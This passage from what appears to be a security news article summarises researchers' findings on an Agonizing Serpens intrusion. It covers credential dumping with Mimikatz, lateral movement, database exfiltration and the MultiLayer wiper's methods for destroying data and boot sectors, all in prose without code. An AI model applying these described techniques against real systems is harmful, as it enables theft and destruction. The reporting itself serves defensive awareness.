To obtain administrative credentials the attackers deployed Mimikatz, an open-source tool for extracting local credentials. They dumped the Windows Security Accounts Manager (SAM) and tried to guess SMB credentials by using password spraying and other brute force techniques. Once credentials were obtained, the attackers used PuTTY Link (plink), a network connection tool, to access other systems.
Data exfiltration and system wiping
In the next stage of the compromise, the attacker deployed the first custom tool called sqlextractor. As its name implies, the tool is used to connect to databases and extract information, particularly data like national ID numbers, passport scans, email addresses, and full addresses. The data is saved in CSV format and is then archived and exfiltrated to a command-and-control server by using public tools such as WinSCP or Pscp.exe (PuTTY Secure Copy Protocol). Process memory dumps saved as .dmp files were also exfiltrated.
“During the incident, the attackers attempted to use three separate wipers as part of the destructive attack,” the researchers said. “While some of the wipers show code similarities to previously reported wipers the Agonizing Serpens group used, others are considered brand new and have been used for the first time in this attack.”
The first wiper is called MultiLayer and is written in .NET. It deploys two binaries called MultiList and MultiWip. MultiList is used to enumerate all files on the system and build a list of file paths with certain folders excluded, while MultiWip is the file wiping component which starts overwriting local files with random data.
To make data recovery attempts harder, the wiper changes the timestamps of the targeted files and changes their original paths before deleting them. MultiLayer also deletes all the Windows Event logs, the volume shadow copies and the first 512 bytes of the physical disk which holds the boot sector to leave systems unbootable after restart. It then deletes itself and all scripts it created and used.
The Palo Alto researchers noted that MultiLayer shares the same function naming conventions and even entire code blocks with other custom tools previously associated with Agonizing Serpens, such as Apostle, IPsec Helper, and Fantasy. This could be the result of the tools sharing the same code base or being created by the same developer.